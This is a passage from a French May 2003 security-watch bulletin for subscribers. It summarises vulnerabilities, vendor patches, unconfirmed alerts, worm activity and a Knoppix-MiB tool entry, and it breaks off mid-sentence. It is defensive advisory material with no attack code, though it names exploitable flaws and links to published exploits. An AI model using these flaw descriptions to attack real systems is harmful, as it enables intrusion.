CERT VU#384932 http://www.kb.cert.org/vuls/id/384932
Veille Technologique Sécurité N°58
© APOGEE Communications - Tous droits réservés
Page 35/65
Diffusion restreinte aux clients abonnés aux services VTS-RAPPORT et VTS-ENTREPRISE
Mai 2003
Vulnérabilité dans Internet Explorer
Le téléchargement d'un grand nombre de fichiers est susceptible de conduire Internet Explorer à outrepasser les
demandes de confirmation de l'utilisateur.
Forte
18/05 Microsoft Internet Explorer 6
Internet Explorer
Comportement dangereux en l'absence de ressources suffisantes
Aucun correctif
http://www.kb.cert.org/vuls/id/251788
CERT VU#251788
NESSUS
Exécution de commandes via Nessus
Une faille dans Nessus permet d'exécuter des commandes arbitraires.
Faible
23/05 Nessus 2.0.5 et inférieures
Injection de script
Correctif existant 'libnasl'
http://www.securityfocus.com/archive/1/322316
Deraison
http://lists.netsys.com/pipermail/full-disclosure/2003-May/009799.htmlRenaud
Full Disclosure
ORACLE
Débordement de buffer dans Oracle Net Services
Un débordement de buffer dans le composant Net Services d'Oracle permet l'exécution de code non sollicité.
Forte
28/04 Oracle 7, 8, 8i, 9i R1 et 9i R2 (toutes plates-formes)
Débordement de buffer
Correctif existant Composant Net Services
http://otn.oracle.com/deploy/security/pdf/2003alert54.pdf
Oracle #54
POPTOP
Débordement de buffer dans le serveur PPTP 'Poptop'
Le serveur PPTP 'Poptop' contient un débordement de buffer.
Moyenne 01/05 Poptop Serveur PPTP versions inférieures à 1.1.3-20030409 et 1.1.4-b3
Débordement de buffer
Correctif existant Code source 'ctrlpacket.c'
CERT VU#673993 http://www.kb.cert.org/vuls/id/673993
http://www.securityfocus.com/archive/1/317995
Bugtraq
QUALCOMM
Usuraption des attachements sur Eudora
Un attachement délivré par Eudora peut être usurpé.
Moyenne 22/05 Qualcomm Eudora 5.2.1
Eudora
Mauvais traitement des attachements
Aucun correctif
http://www.eudora.com/download/eudora/windows/5.2.1/RelNotes.txt
Eudora
http://lists.netsys.com/pipermail/full-disclosure/2003-May/009790.html
Full Disclosure
REALNETWORKS
Débordement de buffer dans RealSystem Server et Proxy
Un débordement de buffer affecte le serveur et le proxy RealSystem de RealNetworks.
Forte
01/05 RealNetworks RealSystem Server 6.x, 7.x et 8.x, RealNetworks RealSystem Proxy 8.x
Débordement de buffer
Correctif existant Serveur et proxy RealSystem
CERT VU#143627 http://www.kb.cert.org/vuls/id/143627
http://www.service.real.com/help/faq/security/bufferoverflow.html
RealNetworks
CERT VU#912219 http://www.kb.cert.org/vuls/id/912219
SCRIPTLOGIC
Multiples vulnérabilités dans le serveur ScriptLogic
De multiples vulnérabilités affectent le serveur ScriptLogic version 4.01.
Forte
30/04 ScriptLogic version 4.01
1 - Mauvais contrôle d'accès
Correctif existant 1 - Partage réseau 'LOGS$'
CERT VU#813737
CERT VU#609137
CERT VU#231705
2 - Requêtes passées avec une configuration arbitraire
2 - Service 'RunAdmin'
3 - Non restriction des requêtes
3 - Service RPC
http://www.kb.cert.org/vuls/id/813737
http://www.kb.cert.org/vuls/id/609137
http://www.kb.cert.org/vuls/id/231705
SGI
Vulnérabilités Apache et PHP dans MediaBase
Le logiciel MediaBase s'appuie sur des versions d'Apache et de PHP qui contiennent plusieurs vulnérabilités.
Forte
19/05 IRIX 6.5 utilisant Kasenna MediaBase
Utilisation de versions vulnérables d'Apache et PHP
Correctif existant Kasenna MediaBase
ftp://patches.sgi.com/support/free/security/advisories/20030502-01-I
20030502-01-I
Veille Technologique Sécurité N°58
© APOGEE Communications - Tous droits réservés
Page 36/65
Diffusion restreinte aux clients abonnés aux services VTS-RAPPORT et VTS-ENTREPRISE
Mai 2003
Vulnérabilité dans l'utilisation de LDAP
Lorsqu'un serveur LDAP est utilisé comme base d'utilisateur par le système, l'existence d'un mot de passe n'est pas
vérifiée.
Moyenne 25/04 SGI IRIX 6.5.19 et précédents
Non vérification de la présence d'un mot de passe
Correctif existant Service de nom LDAP
ftp://patches.sgi.com/support/free/security/advisories/20030407-01-P
20030407-01-P
SUN
Exécution de code distant via PHP sur Sun
Une vulnérabilité de PHP SafeMode permet l'exécution de code arbitraire distant via la fonction 'mail()'.
Critique 06/05 Sun 2800 Workgroup NTT/KOBE, Cobalt RaQ 4, Qube 3, RaQ 550, RaQ XTR, Sun Control Station Production,
Correctif existant
ISS 6787
Sun 46724
Sun LX50 (Sun Linux 5.0)
Fonction PHP 'mail()'
Non validation des arguments
http://www.iss.net/security_center/static/6787.php
http://sunsolve.sun.com/pub-cgi/retrieve.pl?doc=fsalert/46724
Déni de service de 'ns-slapd' sur Sun ONE
Sun ONE Directory Server est vulnérable à un déni de service.
Forte
02/05 Sun ONE Directory Server 4.16, 5.0, Directory Server 5.1 sans Service Pack 2, Directory Server 5.1 avec
Correctif existant
Sun 52102
Solaris 9 (Sparc et x86)
Service 'ns-slapd'
Arrêt du service par tout utilisateur non privilégié
http://sunsolve.sun.com/pub-cgi/retrieve.pl?doc=fsalert/52102
Vulnérabilité dans Sun Cluster 2.2
Une vulnérabilité dans Sun Cluster 2.2 permet d'obtenir des informations sensibles.
Forte
20/05 Sun Cluster 2.2 pour Solaris 2.6, 7 et 8 (Sparc)
Noms et mots de passe stockés en clair
Correctif existant Sun Cluster 2.2
http://sunsolve.sun.com/pub-cgi/retrieve.pl?doc=fsalert/51340
Sun 51340
Exposition d'informations sur les serveurs Sun ONE
Les serveurs Sun ONE sont vulnérables à des attaques conduisant à la fuite d'informations.
Moyenne 09/05 Sun ONE/iPlanet Web Server 6.0 SP1 à SP5, Sun ONE Application Server 7.0
Cipher Block Chaining (CBC)
Mauvais traitement des erreurs
Palliatif proposé
http://sunsolve.sun.com/pub-cgi/retrieve.pl?doc=fsalert/54147
Sun 54147
Vulnérabilité dans le mécanisme 'Sun Ray Smartcard'
Il est possible qu'une session soit maintenue bien que le jeton 'Sun Ray' ait été retirée.
Moyenne 28/04 Sun Ray Server Software 1.3 et 2.0
Non disponible
Correctif existant Firmware Sun Ray
http://sunsolve.sun.com/pub-cgi/retrieve.pl?doc=fsalert/53922
Sun 53922
Déni de service contre Solaris 8
Un utilisateur local peut provoquer un déni de service.
Moyenne 28/04 Sun Solaris 8 (Sparc et Intel)
Mauvaise gestion de la mémoire
Correctif existant Commande 'lofiadm'
http://sunsolve.sun.com/pub-cgi/retrieve.pl?doc=fsalert/54100
Sun 54100
Vulnérabilité dans 'java media framework'
Une vulnérabilité dans 'java media framework' (JMF) permet à une applet malicieuse de provoquer l'arrêt de la
machine virtuelle, voire d'exécuter du code avec des privilèges élevés.
Moyenne 14/05 Sun Java Media Framework 2.1.1, à 2.1.1c
Non disponible
Correctif existant Sun Java Media Framework
http://sunsolve.sun.com/pub-cgi/retrieve.pl?doc=fsalert/54760
Sun 54760
Envoi de messages par 'wall' sous une fausse identité
Il est possible d'utiliser 'wall' sous une fausse identité.
Faible
28/04 Sun Solaris 2.6 à 9 (Sparc et Intel)
Non disponible
Correctif existant Commande 'wall'
http://sunsolve.sun.com/pub-cgi/retrieve.pl?doc=fsalert/51980
Sun 51980
Veille Technologique Sécurité N°58
© APOGEE Communications - Tous droits réservés
Page 37/65
Diffusion restreinte aux clients abonnés aux services VTS-RAPPORT et VTS-ENTREPRISE
Mai 2003
XINETD
Déni de service dans 'xinetd'
Il est possible de provoquer un déni de service en initiant un grand nombre de connexions qui sont refusées.
Forte
13/05 xinetd 2.3.10 et précédents, Red Hat 7.1 à 9
Non libération des ressources mémoire
Correctif existant 'xinetd'
RHSA-03:160-05 https://rhn.redhat.com/errata/RHSA-2003-160.html
ALERTES NON CONFIRMEES
Les alertes présentées dans les tables de synthèse suivantes ont été publiées dans diverses listes
d’information mais n’ont pas encore fait l’objet d’une annonce ou d’un correctif de la part de l’éditeur. Ces
alertes nécessitent la mise en place d’un processus de suivi et d’observation.
3COM
Déni de service contre IP Phone Call manager
Il est possible de provoquer le blocage de IP Phone Call manager.
Forte
25/04 3com NBX IP Phone Call manager, firmware 4.1.21 etprécédents
Débordement de buffer
Correctif existant Serveur FTP embarqué
http://www.secnap.net/security/nbx001.html
Secnap
APPLE
Multiples vulnérabilités des serveurs Darwin
Les serveurs de flux audio et vidéo QuickTime et Darwin sont sensibles à plusieurs vulnérabilités.
Forte
22/05 Apple Darwin Streaming Server (DSS) version 4.1.3, AppleQuickTime Streaming Server
Serveurs Darwin
1 - Débordement d'entier dans le module 'QTSSReflector'
Aucun correctif
Bugtraq
2 - Faille dans le programme 'MP3Broadcaster'
http://www.securityfocus.com/archive/1/322323
FLOOSIETEK
Débordement de buffer dans FTGate Pro
Le serveur de messagerie FTGate Pro contient un débordement de buffer exploitable pour provoquer l'exécution de
code non sollicité.
Critique 07/05 Floosietek FTGate Pro v1.22 (1328)
Débordements de buffer
Correctif existant Service SMTP
http://www.securityfocus.com/archive/1/320536
Bugtraq
iisPROTECT
Contournement d'authentification dans iisPROTECT
La protection fournie par iisPROTECT est facilement contournable.
Forte
23/05 iisPROTECT versions 2.1 et 2.2Les versions antérieures sont probablement aussi affectées
Mauvaise gestion des caractères encodés dans les URLs
Correctif existant iisPROTECT
iDefense 05.22.03 http://www.idefense.com/advisory/05.22.03.txt
KERIO
Vulnérabilité dans Kerio Personal Firewall
Deux vulnérabilités ont été découvertes dans la fonctionnalité d'administration à distance de Kerio Personal Firewall.
Critique 29/04 Kerio Personal Firewall 2.1.4 et précédents
Administration à distance
Faiblesse du mécanisme de chiffrement, Débordement de buffer
Aucun correctif
CORE03-0305-02 http://www.coresecurity.com/common/showdoc.php?idx=314&idxseccion=10
LINUX MANDRAKE
Augmentation de privilèges par 'cdrecord'
L'utilitaire 'cdrecord' permet d'acquérir les privilèges root lorsqu'il est installé setuid.
Forte
14/05 Linux Mandrake utilisant cdrecord 2.0
'cdrecord'
Vulnérabilité de formatage de chaîne de caractères
Aucun correctif
http://www.securityfocus.com/archive/1/321355
Bugtraq
MICROSOFT
Veille Technologique Sécurité N°58
© APOGEE Communications - Tous droits réservés
Page 38/65
Diffusion restreinte aux clients abonnés aux services VTS-RAPPORT et VTS-ENTREPRISE
Mai 2003
Exécution de programme arbitraire via Outlook Express
Il est possible de déposer et d'installer un exécutable dans la zone restreinte via Outlook Express.
Critique 23/05 Microsoft Outlook Express 6.00.2800.1123 avec Windows MediaPlayer 7.01.00.3055 ou 8.00.00.4487
Outlook Express
Appel non sécurisé des fichiers au format 'asf'
Aucun correctif
http://www.securityfocus.com/archive/1/322114
Malware
Cross-Site Scripting dans les serveurs ISA
Une faille de type Cross-Site Scripting affecte les serveurs Microsoft ISA.
Moyenne 22/05 Microsoft ISA Server 2000, 2000 FP1 et 2000 SP1
Serveurs ISA
Cross-Site Scripting
Aucun correctif
http://www.securityfocus.com/bid/7623
BID [7623]
MIRABILIS
Multiples vulnérabilités dans le client 'ICQ'
Plusieurs vulnérabilités affectent le client 'ICQ' de Mirabilis.
Forte
07/05 Mirabilis ICQ Pro 2003a et précédents
Clients 'ICQ' et 'POP3'
Débordements de buffer, Défaut de formatage de chaînes de caractères,
Aucun correctif
CORE-2003-0303
Faiblesse de l'authentification
http://www.coresecurity.com/common/showdoc.php?idx=315&idxseccion=10
MOD_SURVEY
Déni de service contre le module Apache 'mod_survey'
Le module Apache 'mod_survey' permet de provoquer un déni de service contre le serveur sur lequel il est installé.
Forte
04/05 mod_survey 3.0.14 et précédents
Création de répertoires à l'initiative de l'utilisateur distant
Correctif existant Module apache 'mod_survey'
http://www.securityfocus.com/archive/1/320436
Bugtraq
NETSCAPE
Mauvais traitement des requêtes sur Netscape Enterprise
Une requête spécialement construite permet d'obtenir le contenu de la racine web des serveurs Netscape
Enterprise.
Faible
16/05 Netscape Enterprise Server versions 2.0, 3.0 à 3.6 SP3 et4.0 à 4.1 SP8
Mauvais traitement des requêtes
Correctif existant Serveurs Netscape Enterprise
http://www.securityfocus.com/bid/7621
BID 7621
OPERA
Débordement de buffer dans le navigateur Opera
Un débordement de buffer affecte le navigateur Opera.
Moyenne 23/05 Opera 7.10 build 2840 et 7.03 build 2670 (Windows), Opera7.1.0 Beta 1 build 388 (Linux)
Débordement de buffer
Correctif existant Navigateur Opera
http://www.securiteam.com/securitynews/5XP0J0KA0G.html
Securiteam
SLMAIL
Multiples vulnérabilités dans SLMail et SLWebMail
De multiples vulnérabilités affectent SLMail et SLWebMail.
Forte
07/05 SLMail version 5.1.0.4420 (sur Windows)Interface SLWebMail
1 - Multiples débordements de buffer
Correctif existant 1 - SLMail
NISR07072003A
NISR07052003B
2 - SLWebMail
2 - Multiples vulnérabilités
http://www.nextgenss.com/advisories/slmail-vulns.txt
http://www.nextgenss.com/advisories/slwebmail-vulns.txt
SLOCATE
Débordement d'entier dans 'slocate'
Un débordement d'entier affecte le programme 'slocate'.
Moyenne 23/05 slocate 2.1 à 2.7
'slocate'
Débordement d'entier
Aucun correctif
http://www.securityfocus.com/bid/7629
BID 7629
Veille Technologique Sécurité N°58
© APOGEE Communications - Tous droits réservés
Page 39/65
Diffusion restreinte aux clients abonnés aux services VTS-RAPPORT et VTS-ENTREPRISE
Mai 2003
YOUNGZSOFT
Vulnérabilité dans CMailServer 4.0
Le serveur de messagerie CMailServer contient un débordement de buffer exploitable pour provoquer l'exécution de
code non sollicité.
Critique 10/05 Youngzsoft CMailServer 4.0.2003.03.27
Débordements de buffer
Correctif existant Service SMTP
http://www.infowarfare.dk/Advisories/iw-17-advisory.txt
Infowarfare
AUTRES INFORMATIONS
REPRISES D’AVIS
ET
CORRECTIFS
Les vulnérabilités suivantes, déjà publiées, ont été mises à jour, reprises par un autre organisme, ou ont
donné lieu à la fourniture d’un correctif :
CIAC
Reprise de l'avis HP HPSBUX0305-258, révision 1
Le CIAC a mis à jour son bulletin [N-094] pour refléter la mise à jour de l'avis original d'HP, faisant mention d'un
nouveau correctif.
http://www.ciac.org/ciac/bulletins/n-094.shtml
Reprise de l'avis Oracle 54
Le CIAC a repris, sous la référence N-085, l'avis Oracle 54 au sujet d'un débordement de buffer dans le composant
Net Services d'Oracle permettant d'exécuter du code non sollicité.
http://www.ciac.org/ciac/bulletins/n-085.shtml
Reprise de l'avis HP [SSRT3471]
Le CIAC a repris, sous la référence N-086, l'avis HP [SSRT3471] traitant d'une vulnérabilité de lien symbolique dans
'dupatch' et 'setld' sur HP Tru64 UNIX.
http://www.ciac.org/ciac/bulletins/n-086.shtml
Reprise de l'avis Cisco sur Catalyst
Le CIAC a repris sour la référence [N-083] l'avis Cisco portant sur une vulnérabilité dans l'authentification sur ses
équipements Catalyst.
http://www.ciac.org/ciac/bulletins/n-083.shtml
Reprise de l'avis Microsoft MS03-016
Le CIAC a repris sous la référence [N-087] l'avis de Microsoft portant sur deux vulnérabilités de 'BizTalk'.
http://www.ciac.org/ciac/bulletins/n-087.shtml
Reprise de l'avis HP HPSBUX0304-257
Le CIAC a repris sous la référence [N-088] l'avis de HP portant sur une vulnérabilité dans 'rexec'.
http://www.ciac.org/ciac/bulletins/n-088.shtml
Reprise de l'avis Red Hat RHSA-2003:093-14
Le CIAC a repris sous la référence [N-089] l'avis de Red Hat indiquant la disponibilité d'un correctif pour MySQL.
http://www.ciac.org/ciac/bulletins/n-089.shtml
Reprise de l'avis Red Hat RHSA-2003:113-13
Le CIAC a repris sous la référence [N-090] l'avis de Red Hat portant sur une vulnérabilité du module Apache
'mod_auth_any'.
http://www.ciac.org/ciac/bulletins/n-090.shtml
Reprise de l'avis Sun 46724
Le CIAC a repris, sous la référence N-091, l'avis Sun 46724 au sujet d'une vulnérabilité de PHP SafeMode
permettant l'exécution de code arbitraire distant via la fonction 'mail()'.
http://www.ciac.org/ciac/bulletins/n-091.shtml
Reprise de l'avis Microsoft MS03-017
Le CIAC a repris, sous la référence N-092, l'avis Microsoft MS03-017 au suet d'une faille dans Windows Media
Player permettant l'exécution de programmes malicieux via les 'skins'.
http://www.ciac.org/ciac/bulletins/n-092.shtml
Reprise de l'avis Cisco sur les VPN 3000
Le CIAC a repris, sous la référence N-093, le bulletin Cisco traitant de plusieurs vulnérabilités affectant les
concentrateurs VPN 3000.
http://www.ciac.org/ciac/bulletins/n-093.shtml
Veille Technologique Sécurité N°58
© APOGEE Communications - Tous droits réservés
Page 40/65
Diffusion restreinte aux clients abonnés aux services VTS-RAPPORT et VTS-ENTREPRISE
Mai 2003
Reprise de l'avis HP HPSBUX0305-258
Le CIAC a repris, sous la référence N-094, l'avis HP HPSBUX0305-258 au sujet d'une vulnérabilité localement
exploitable dans le programme 'wall'.
http://www.ciac.org/ciac/bulletins/n-094.shtml
Reprise de l'avis Red Hat RHSA-2003:002-30
Le CIAC a repris sous la référence [N-095] l'avis de Red Hat concernant la disponibilité des correctifs pour KDE.
http://www.ciac.org/ciac/bulletins/n-095.shtml
Reprise de l'avis SGI 20030407-01-P
Le CIAC a repris sous la référence [N-084] l'avis 20030407-01-P de SGI portant sur une vulnérabilité dans
l'utilisation de bases LDAP comme base d'utilisateurs.
http://www.ciac.org/ciac/bulletins/n-084.shtml
CISCO
Informations sur un correctif pour les CSS 11000
Cisco a mis à jour son bulletin traitant de l'inefficacité de l'authentification de l'interface d'administration de ses CSS
11000. Cette vulnérabilité est corrigée dans la version 6.10 de WebNS, qui sera disponible fin mai 2003.
http://www.cisco.com/warp/public/707/arrowpoint-webmgmt-vuln-pub.html
Révision de deux bulletins sur 'CatOS' et 'ACS'
Cisco a révisé deux bulletins : Le premier fournit un lien vers des exemples de configuration AAA pour Cisco
Catalyst. Le second clarifie l'endroit où télécharger le correctif pour Cisco Secure ACS 3.1.1.
http://www.cisco.com/warp/public/707/cisco-sa-20030424-catos.shtml
http://www.cisco.com/warp/public/707/cisco-sa-20030423-ACS.shtml
FREEBSD
Disponibilité de plusieurs correctifs
FreeBSD annonce la disponibilité des correctifs corrigeant les vulnérabilités présentes dans les paquetages :
samba
FreeBSD-SA-03:01
seti@home
FreeBSD-SA-03:02
http://www.linuxsecurity.com/advisories/
HP
Nouveaux correctifs pour Sendmail
HP a publié de nouveaux correctifs pour Sendmail pour ses systèmes HP-UX 11.00 et 11.11.
http://www5.itrc.hp.com/service/cki/docDisplay.do?docId=HPSBUX0304-253
Correctifs pour 'xdrmem_getbytes()'
HP a publié des correctifs pour ses
'xdrmem_getbytes()'.
systèmes
11.00
et
11.11,
concernant
la
vulnérabilité
touchant
http://www5.itrc.hp.com/service/cki/docDisplay.do?docId=HPSBUX0303-252
Révision du bulletin HPSBUX0304-254 sur Samba
HP a révisé le bulletin HPSBUX0304-254 sur Samba afin de clarifier les l'identification de la version Samba utilisée.
Les correctifs pour les serveurs CIFS sont un portage sur une version Samba 2.2.5, issu de la version 2.2.8a.
http://www5.itrc.hp.com/service/cki/docDisplay.do?docId=HPSBUX0304-254
Correctifs définitifs pour Samba/CIFS
HP a publié pour ses systèmes HP-UX 11.00, 11.11 et 11.22 la version A.01.09.04 de son server CIFS, immune au
débordement de buffer qui affecte les versions précédentes.
http://www5.itrc.hp.com/service/cki/docDisplay.do?docId=HPSBUX0303-251
Mise à jour du bulletin sur OpenSSL
HP a mis à jour son bulletin indiquant des correctifs pour OpenSSL. Un correctif pour les serveurs utilisant une
version 1.3.27.02 ou précédente d'Apache est maintenant disponible.
http://www5.itrc.hp.com/service/cki/docDisplay.do?docId=HPSBUX0304-255
Correctif pour 'wall' sur HP-UX 11.04
HP a publié un correctif pour HP-UX 11.04 pour l'utilitaire 'wall' qui permettait une augmentation de privilèges.
http://europe-support2.external.hp.com/atq/bin/doc.pl/screen=atqDocTextSecB/?CERTDOCID=HPSBUX0305-258
LINUX CALDERA
Disponibilité de nombreux correctifs
Caldera annonce la disponibilité des correctifs corrigeant les vulnérabilités présentes dans les paquetages :
samba
CSSA-2003-017.0
file
CSSA-2003-018.0
tcpsec
CSSA-2003-019.0
kmod/ptrace
CSSA-2003-020.0
mgetty
CSSA-2003-021.0
http://www.linuxsecurity.com/advisories/caldera.html
Veille Technologique Sécurité N°58
© APOGEE Communications - Tous droits réservés
Page 41/65
Diffusion restreinte aux clients abonnés aux services VTS-RAPPORT et VTS-ENTREPRISE
Mai 2003
LINUX DEBIAN
Disponibilité de nombreux correctifs
Debian annonce la disponibilité des correctifs corrigeant les vulnérabilités présentes dans les paquetages :
pptpd
DSA-295-1
kdebase
DSA-296-1
snort
DSA-297-1
epic4
DSA-298-1
leksboot
DSA-299-1
balsa
DSA-300-1
libgtop
DSA-301-1
fuzz
DSA-302-1
mysql
DSA-303-1
lv
DSA-304-1
sendmail
DSA-305-1
ircii-pana
DSA-306-1
http://www.debian.org/security/2003/
LINUX MANDRAKE
Disponibilité de nombreux correctifs
Mandrake annonce la disponibilité des correctifs corrigeant les vulnérabilités présentes dans les paquetages :
ethereal
MDKSA-2003:051
9.1
snort
MDKSA-2003:052
8 2 / 9.0 / 9.1 /
FW 8.2 / CS 2.1
mgetty
MDKSA-2003:053
8 2 / 9.0
FW 8.2 / CS 2.1
man
MDKSA-2003:054
8 2 / 9.0 / 9.1 /
FW 8.2 / CS 2.1
kopete
MDKSA-2003:055
9.1
xinetd
MDKSA-2003:056
8 2 / 9.0 / 9.1 /
FW 8.2 / CS 2.1
mysql
MDKSA-2003:057
8 2 / 9.0
CS 2.1
cdrecord
MDKSA-2003:058
8 2 / 9.0 / 9.1 /
CS 2.1
lpr
MDKSA-2003:059
82
LPRng
MDKSA-2003:060
8 2 / 9.0 / 9.1 /
CS 2.1
http://www.linux-mandrake.com/en/security/
LINUX REDHAT
Disponibilité de nombreux correctifs
RedHat annonce la disponibilité des correctifs corrigeant les vulnérabilités présentes dans les paquetages :
ethereal
RHSA-2003:076-01
7.2 / 7.3 / 8.0 / 9.0
squirrelmail
RHSA-2003:112-01
8.0 / 9.0
lprng
RHSA-2003:142-01
7.1 / 7.2 / 7.3 / 8.0 / 9.0
micq
RHSA-2003:118-01
7.2 / 7.3
zlib
RHSA-2003:079-01
7.1 / 7.2 / 7.3 / 8.0
mysql
RHSA-2003:093-02
7.1 / 7.2 / 7.3 / 8.0
man
RHSA-2003:133-01
7.1 / 7.2 / 7.3 / 8.0
mod_auth
RHSA-2003:113-01
7.2 / 7.3
kde
RHSA-2003:002-01
7.1 / 7.2 / 7.3 / 8.0 / 9.0
xinetd
RHSA-2003:160-01
7.1 / 7.2 / 7.3 / 8.0 / 9.0
kernel
RHSA-2003:172-01
7.1 / 7.2 / 7.3 / 8.0 / 9.0
gnupg
RHSA-2003:175-01
7.1 / 7.2 / 7.3 / 8.0 / 9.0
lv
RHSA-2003:169-01
7.1 / 7.2 / 7.3 / 8.0 / 9.0
http://www.linuxsecurity.com/advisories/redhat.html
MICROSOFT
Mise à jour de l'avis MS02-071
Microsoft a mis à jour son bulletin MS02-071, concernant une vulnérabilité dans 'WM_TIMER' pour avertir de la
disponibilité d'un nouveau correctif pour NT 4.0 TSE. Le précédent était susceptible de causer des
dysfonctionnement sur les versions multiprocesseurs ou japonaises.
http://www.microsoft.com/technet/security/bulletin/MS02-071.asp
Vulnérabilité des comptes .NET Hotmail et Passport
Deux vulnérabilités similaires affectent les comptes .NET utilisés par les services Hotmail et Passport. La première
permet de contourner la question posée pour la remise à zéro du mot de passe lorsqu'un utilisateur a oublié le sien.
La seconde permet de remettre à zéro un compte utilisateur sans fournir d'information au préalable. Il n'existe pas
de correctif au niveau de l'utilisateur. On notera que Microsoft a supprimé, dans la soirée du 8 mai, l'option de
remise à zéro du mot de passe.
http://www.pakcert.org/advisory/PC-080503.html
Vulnérabilités non corrigées sur Internet Explorer
Le site de Thor Larholm recense les vulnérabilités affectant Internet Explorer. Nouvelles ou anciennes, 14
vulnérabilités ne sont toujours pas corrigées. Cette page fournit aussi quelques codes d'exploitation.
http://www.pivx.com/larholm/unpatched/
Veille Technologique Sécurité N°58
© APOGEE Communications - Tous droits réservés
Page 42/65
Diffusion restreinte aux clients abonnés aux services VTS-RAPPORT et VTS-ENTREPRISE
Mai 2003
OPERA
Utilisation de machine virtuelle vulnérable
La version 7.11 d'Opera est fournie avec une version de la machine virtuelle java vulnérable au déni de service
affectant 'java.util.zip'. Toutefois, si une version immune de la machine virtuelle a été installée préalablement à
l'installation d'Opera, la machine virtuelle la plus à jour est conservée.
http://archives.neohapsis.com/archives/vulnwatch/2003-q2/0063.html
ORACLE
Révision de l'alerte 54 sur Oracle Net Services
Oracle a révisé l'alerte 54 sur Oracle Net Services afin d'annoncer la disponibilité de nouveaux correctifs pour les
versions Oracle Database Server 9.2.0.2, 9.0.1.4, 8.1.7.4 et 8.0.6.3.
http://otn.oracle.com/deploy/security/pdf/2003alert54.pdf
SGI
Nouveau correctif pour 'lpr'
SGI a publié un nouveau correctif pour 'lpr', sujet à diverses vulnérabilités. Certaines de ces vulnérabilités n'étaient
pas corrigées par le précédent correctif et le nouveau porte la référence '5071'.
ftp://patches.sgi.com/support/free/security/advisories/20030406-02-P
Correctif disponible pour OpenSSL
SGI a publié un correctif pour OpenSSL pour son système IRIX 6.5.19. L'application du correctif met à jour
OpenSSL vers la version 0.9.6g.
http://www.securityfocus.com/advisories/5379
SUN
Vulnérabilité dans Samba sue les serveurs Cobalt
La vulnérabilité présente sur Samba 2.0.x à 2.2.7a affecte les serveurs Sun Cobalt RaQ4, RaQ XTR, Qube3, RaQ
550 ainsi que Sun Linux 5.0. Aucun correctif n'est disponible pour le moment, mais une parade est proposée par
Sun et par Samba.
http://sunsolve.sun.com/pub-cgi/retrieve.pl?doc=fsalert/53924
Correctifs pour 'libnsl'
Sun a publié un correctif pour 'libnsl', dont un débordement de buffer permettait l'exécution de code arbitraire.
Notons qu'aucun correctif n'est actuellement disponible pour Solaris 7.
http://sunsolve.sun.com/pub-cgi/retrieve.pl?doc=fsalert/51884
Correctifs pour 'cvs'
Sun a annoncé la disponibilité des correctifs pour 'cvs' pour Sun Cobalt et Sun Linux, vulnérables au problème de
type 'double-free' permettant d'exécuter des commandes arbitraires sur le serveur.
http://sunsolve.sun.com/pub-cgi/retrieve.pl?doc=fsalert/50439
Correctifs pour 'libnsl'
Sun a publié les correctifs pour 'libnsl' pour Solaris 2.6, 7, 8 et 9 (Sparc et Intel). Un débordement de buffer permet
l'exécution de code arbitraire. Cette faille est décrite dans le bulletin CERT CA-2003-10.
http://sunsolve.sun.com/pub-cgi/retrieve.pl?doc=fsalert/51884
CODES D’EXPLOITATION
Les codes d’exploitation des vulnérabilités suivantes ont fait l’objet d’une large diffusion :
KERIO
Code d'exploitation pour les pare-feu Tiny et Kerio
Un code d'exploitation pour Tiny et Kerio Personal Firewall a été publié dans la liste Bugtraq. Il est donc
recommandé de contacter l'éditeur pour obtenir un correctif, ou de désactiver le service d'administration
vulnérable.
http://www.securityfocus.com/archive/1/320911
BULLETINS ET NOTES
Les bulletins d’information suivants ont été publiés par les organismes officiels de surveillance et les
éditeurs :
APPLE
Faiblesse du chiffrement du mot de passe de 'AirPort'
La société @Stake a émis un avis pour informer que le point d'accès WiFI 'AirPort' d'Apple dissimule le mot de
passe administrateur circulant sur le réseau d'une manière permettant de le retrouver facilement. La réponse
d'Apple est qu'il est déconseillé d'utiliser une connexion WiFI non protégée par WEP pour administrer cet
équipement.
http://www.atstake.com/research/advisories/2003/a051203-1.txt
Veille Technologique Sécurité N°58
© APOGEE Communications - Tous droits réservés
Page 43/65
Diffusion restreinte aux clients abonnés aux services VTS-RAPPORT et VTS-ENTREPRISE
Mai 2003
OpenBSD
Disponibilité de OpenBSD version 3.3
OpenBSD a annoncé la sortie de OpenBSD version 3.3. Cette nouvelle version apporte de grandes améliorations et
corrige plusieurs vulnérabilités.
http://www.openbsd.org/33.html
http://www.openbsd.org/plus33.html
VIRUS
Forte activité virale
Le site du CERT/CC et de Trend Micro mettent en garde contre deux vers, 'WORM_FIZZER' et la variante
'WORM_LOVGATE.J' qui se propagent rapidement actuellement.
http://www.trendmicro.com/vinfo/
http://www.cert.org/current/current_activity.html#peido
Propagation d'un ver sous couvert d'un avis Microsoft
Le récent ver 'W32/Palyh-A' qui se propage actuellement possède la particularité de se présenter comme un
message provenant du support technique de Microsoft. Si le message est ouvert le fichier attaché est exécuté et le
virus se propage alors classiquement en utilisant les carnets d'adresses ou les partages de fichiers.
http://www.sophos.com/virusinfo/analyses/w32palyha.html
Veille Technologique Sécurité N°58
© APOGEE Communications - Tous droits réservés
Page 44/65
Diffusion restreinte aux clients abonnés aux services VTS-RAPPORT et VTS-ENTREPRISE
Mai 2003
ATTAQUES
OUTILS
KNOPPIX-MIB
# Description
La Fédération Informatique et Libertés annonce la sortie de ‘Knoppix-Mib’, une adaptation
Française de ‘Knoppix’, une distribution allemande d’un Linux 2.4.x minimaliste et prêt à
l’emploi. (Rapport N°43 – Février 2002).
Développée par Michel Bouissou – d’où l’extension ‘MiB’ – cette version intègre un module
permettant de chiffrer la mémoire virtuelle ainsi que les fichiers de l'utilisateur. Ceux-ci pourront
ainsi être sauvegardés en toute sécurité sur le disque du système hôte, ou sur tout autre dispositif
de stockage présent sur ce système, ‘Knoppix’ s’exécutant entièrement dans la mémoire vive du système.
La distribution actuelle de ‘Knoppix-Mib’ diffère de la version 3.2 de ‘Knoppix’ par l’ajout des modules et utilitaires
suivants:
- Environnement graphique KDE 3.1.1,
- Environnement de travail Ximian Evolution 1.2,
- Scripts permettant l’installation automatique de FlashPlayer,
- Support automatique des partitions chiffrées sur les systèmes de fichiers FAT/FAT32,
- Intégration de la version française de OpenOffice 1.0.2,
- Intégration du navigateur Mozilla 1.3 Chromium et d’Enigmail 0.74,
- Intégration du serveur de messagerie PostFix pré-configuré avec des certificats génériques et le support de TLS,
- Sauvegarde de certains fichiers de configuration système sur le volume de données de l’utilisateur,
- Pages de manuel en Français
Pour fonctionner correctement, ‘Knoppix-Mib’ requiert de disposer au minimum de 96 Mo de RAM, d’un processeur
